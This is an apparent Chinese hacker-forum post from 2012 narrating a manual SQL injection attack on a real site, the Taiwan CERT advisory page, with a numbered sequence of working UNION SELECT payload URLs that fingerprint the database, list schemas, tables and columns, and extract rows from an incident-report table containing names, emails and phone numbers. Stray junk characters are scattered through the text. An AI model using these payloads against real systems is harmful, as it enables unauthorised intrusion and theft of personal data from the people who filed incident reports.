1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询& V7 F. f2 X7 p! q
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
Y6 |+ T5 A1 f$ h+ Chttp://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--
" A' F Y( Z- Z$ w3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--, F7 R$ B! y4 O) `" ?
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
6 o) Z* A8 X2 H1 b* L1 u6 _! X3 h c4.判断有没有写权限( e) d/ U/ I4 \) ]/ u
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限& p. e9 J( k$ e8 J9 V0 m
没办法,手动猜表啦
& d- F1 L) q, ~: E- U8 K! A- W! f/ n5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
' i4 _6 H. [4 Z: x/ l: e但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
( D. K& k2 o" D7 Q+ _9 g% @http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--2 t4 |" J- \# n- S
成功查出所有数据库,国外的黑客就是不一般。数据库如下:; Q, E7 b K7 ]2 A! W( j
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb1 Z, [" Y* V7 a0 A6 X
6.爆表,爆的是twcert库3 k! _0 e: B4 p) a7 v" h% U4 ^
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
3 d1 K4 y9 S# m4 {爆出如下表
M$ R! ? y0 c: j7 kdownloadfile,irsys,newsdata,secrpt,secrpt_big5! b v5 h. r! v0 D6 p* r9 G$ }/ B+ e
7.爆列名,这次爆的是irsys表
+ }8 X1 B/ }! P8 o" ehttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
3 U' }) p# z) m9 K! v爆出如下列' z3 `- \" g# ?2 L0 l
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
' j: V9 Q8 y$ d" h8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。 \! U6 e G( Z: e
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--; L3 `5 q: Y/ R; s. g
返回是3,说明每个列里有3个地段7 ^& i8 |' B8 N1 ~7 j
9.爆字段内容6 [+ L+ B4 W ?- R; O
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
* K( r/ B% {0 l5 M. X爆出name列的第一个字段的内容$ f1 W/ l1 O! g# P: y2 I
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
5 ?( E# O5 c1 E# m1 ^爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对